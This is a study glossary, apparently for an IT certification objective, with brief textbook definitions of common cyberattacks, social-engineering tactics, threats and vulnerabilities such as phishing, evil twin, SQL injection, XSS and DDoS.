2.4 Explain common social-engineering attacks, threats, and vulnerabilities.
Dictionary attack
A dictionary attack is a type of cyberattack that involves using a list of known words, phrases, or commonly used passwords to guess a password or encryption key and gain access to a system or data.
Zero-day attack
A zero-day attack is a type of cyberattack that exploits a previously unknown vulnerability in software or hardware before the vendor or developer has a chance to patch it, leaving systems vulnerable.
Evil twin
An evil twin is a type of social engineering attack that involves setting up a fake wireless access point that looks similar to a legitimate access point to trick victims into connecting to the attacker's network, enabling the attacker to steal sensitive information or perform other nefarious activities.
Insider threat
An insider threat is a type of cyberthreat that involves malicious or unintentional actions by an authorized user of a system or network that can result in harm to the organization, such as theft or sabotage of data.
On-path attack
An on-path attack is a type of cyberattack that intercepts or modifies communication between two parties, allowing the attacker to eavesdrop on or manipulate the communication for nefarious purposes.
Bring your own device (BYOD)
Bring your own device (BYOD) refers to the practice of employees using their personal devices for work-related purposes, which can increase the risk of security vulnerabilities if those devices are not properly secured or managed.
Cross-site scripting (XSS)
Cross-site scripting is a type of cyberattack that involves injecting malicious scripts into web pages viewed by other users, allowing attackers to steal information, take control of user accounts, or perform other nefarious activities.
Spoofing
Spoofing is a type of cyberattack that involves disguising a communication from an unknown source as being from a known, trusted source, in order to gain unauthorized access to systems or data.
Tailgating
Tailgating is a type of social engineering attack that involves an attacker following closely behind a legitimate user to gain unauthorized access to a restricted area or system.
Unpatched systems
Unpatched systems are systems that have not been updated with the latest security patches and updates, potentially leaving them vulnerable to cyberattacks or other security risks.
Unprotected systems (missing antivirus/missing firewall)
Unprotected systems are systems that lack essential security measures such as antivirus software or firewalls, leaving them vulnerable to cyberattacks or other security risks.
Vishing
Vishing is a type of social engineering attack that involves using voice calls to trick victims into revealing sensitive information or performing actions that can be used for nefarious purposes.
Whaling
Whaling is a type of social engineering attack that targets high-level executives or other important individuals to obtain sensitive information or gain unauthorized access to a system.
Vulnerabilities
vulnerability is some fault or weakness in a system that could be exploited by a threat actor -causes include improperly configured or installed hardware or software, delays in applying and testing software and firmware patches, untested software and firmware patches, the misuse of software or communication protocols, poorly designed network architecture, inadequate physical security, insecure password usage, and design flaws in software or operating systems, such as unchecked user input
Dumpster diving
Dumpster diving is a type of social engineering attack that involves an attacker searching through a victim's trash or recycling to obtain sensitive information, such as passwords, bank statements, or other confidential data.
EOL OSs
EOL (End-of-Life) OSs are operating systems that are no longer supported by their developers or vendors, leaving them vulnerable to security risks and exploits that are not being patched.
Impersonation
Impersonation is a type of social engineering attack that involves an attacker pretending to be a trusted entity, such as an IT support technician, to trick victims into divulging sensitive information or performing actions that can be used for nefarious purposes.
Non-compliant systems
Non-compliant systems are systems that do not meet the security standards or policies set forth by an organization, potentially leaving them vulnerable to cyberattacks or other security risks.
Phishing
Phishing is a type of social engineering attack that involves sending fraudulent emails, text messages, or websites that impersonate a trusted entity to trick victims into revealing sensitive information.
Threats
Potential for an entity to exercise a vulnerability (that is, to breach security). -external threat actor is one who has no account or authorized access to the target system. A malicious external threat actor must infiltrate the security system using malware and/or social engineering -insider threat actor is one who has been granted permissions on the system. This typically means an employee, but insider threat can also arise from contractors and business partners
Structured Query Language (SQL) Injection
SQL injection is a type of cyberattack that exploits vulnerabilities in web applications or other software that use SQL databases, allowing attackers to execute malicious SQL queries and gain unauthorized access to data.
Shoulder surfing
Shoulder surfing is a type of social engineering attack that involves an attacker looking over a victim's shoulder to obtain sensitive information, such as passwords, PINs, or other confidential data.
Social engineering
Social engineering is the practice of using psychological manipulation to trick people into divulging sensitive information or performing actions that can be used for nefarious purposes.
Brute-force attack
A brute-force attack is a type of cyberattack that involves attempting every possible combination of passwords or encryption keys until the correct one is found, allowing the attacker to gain access to a system or data.
Distributed denial of service (DDoS)
A DDoS attack is a type of cyberattack that involves flooding a targeted system or network with traffic from multiple sources, making it unavailable to users.
Denial of service (DoS)
A DoS attack is a type of cyberattack that involves flooding a targeted system or network with traffic from a single source, making it unavailable to users.
